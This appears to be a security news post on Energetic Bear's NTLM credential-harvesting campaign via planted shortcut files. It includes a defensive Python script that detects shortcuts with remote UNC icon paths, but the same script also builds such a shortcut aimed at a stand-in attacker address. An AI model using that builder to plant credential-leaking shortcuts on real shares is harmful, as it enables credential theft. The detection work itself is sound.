The Russia-based advanced persistent threat group Energetic Bear is involved in an ongoing campaign across Europe, Turkey and the USA.
Energetic Bear’s goal appears to be the collection of NT LAN Manager (NTLM) credentials via SMB. The first confirmed attacks were reported in March 2017, although it is possible the campaign began before that date.
Once Energetic Bear has access to a target network it enumerates any network drives it has write permission to and places shortcut (.lnk) files on them. When a host renders a folder containing one of these links, Windows attempts to load a resource referenced by the shortcut (typically its icon) from a server the attackers control, and the user's NTLM challenge-response is sent to that server in the process and harvested. Note that what is captured is the NTLM authentication exchange (often called the Net-NTLM hash), not the password hash stored on the host; it can be cracked offline or relayed, but it is not a pass-the-hash credential by itself.
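As an added example (not code from the article or from the group's own tooling), the following Python script builds a minimal shortcut in the MS-SHLLINK layout that this technique relies on, parses it back, and flags any field whose UNC path points at a host outside an allowlist. The shortcut bytes and host names are constructed for the example; 203.0.113.7 is a documentation address standing in for an attacker-controlled server, and fileserver01 is a hypothetical internal file server.

```python
"""Parse Windows shortcut (.lnk) files and flag UNC references to untrusted hosts.

A shortcut planted on a writable share can carry an icon location such as
\\\\attacker-host\\share\\app.ico; Explorer fetches the icon over SMB when the
folder is listed and the host authenticates with NTLM on the way.
Added illustration, not the article's code; samples below are constructed.
"""
import struct

HEADER_SIZE = 0x4C
# CLSID 00021401-0000-0000-C000-000000000046 in on-disk (little-endian) form
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) used here
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData blocks occur in this order, each present only if its flag is set
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link as a dict of name -> str."""
    if len(data) < HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # skip the item ID list
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                  # LinkInfoSize counts itself
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, pos)  # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def build_lnk(icon_location: str, relative_path: str = "") -> bytes:
    """Build a minimal Unicode shortcut carrying an icon location (and optional path)."""
    flags = HAS_ICON_LOCATION | IS_UNICODE
    if relative_path:
        flags |= HAS_RELATIVE_PATH
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        HEADER_SIZE, LNK_CLSID, flags,
        0,            # FileAttributes
        0, 0, 0,      # creation / access / write FILETIMEs (unset)
        0, 0,         # FileSize, IconIndex
        1,            # ShowCommand = SW_SHOWNORMAL
        0, 0, 0, 0,   # HotKey, Reserved1-3
    )

    def block(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = block(relative_path) if relative_path else b""
    return header + body + block(icon_location)


def unc_host(value: str):
    """Host part of a \\\\host\\share path, lower-cased, or None if not UNC."""
    if value.startswith("\\\\") and not value.startswith("\\\\?\\"):
        return value[2:].split("\\", 1)[0].lower() or None
    return None


def find_remote_references(data: bytes, allowed_hosts=()):
    """List (field, host, value) for every UNC reference to a non-allowlisted host."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for name, value in parse_lnk(data).items():
        host = unc_host(value)
        if host and host not in allowed:
            findings.append((name, host, value))
    return findings


# Constructed samples: 203.0.113.7 (documentation range) stands in for an
# attacker-controlled server; fileserver01 is a hypothetical internal host.
MALICIOUS_SAMPLE = build_lnk("\\\\203.0.113.7\\share\\app.ico")
BENIGN_SAMPLE = build_lnk("\\\\fileserver01\\icons\\app.ico", ".\\report.docx")

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        hits = find_remote_references(sample, allowed_hosts=["fileserver01"])
        print(label, parse_lnk(sample), "->", hits or "no untrusted UNC references")
```

Run across the .lnk files on a share, this is the triage a responder wants: a shortcut whose icon location, working directory or path resolves to a host that is not one of your own file servers is worth pulling, because Explorer requests the icon as soon as the folder is listed, without the user ever opening the link.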
The majority of C&C servers appear to be hosted on compromised servers running content management systems, which suggests the attackers may have used the same exploit to gain control of each one.
Further technical details can be found here.
IPs To Block
- Windows and Linux-based Servers
Duncan is a technology professional with over 20 years' experience in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.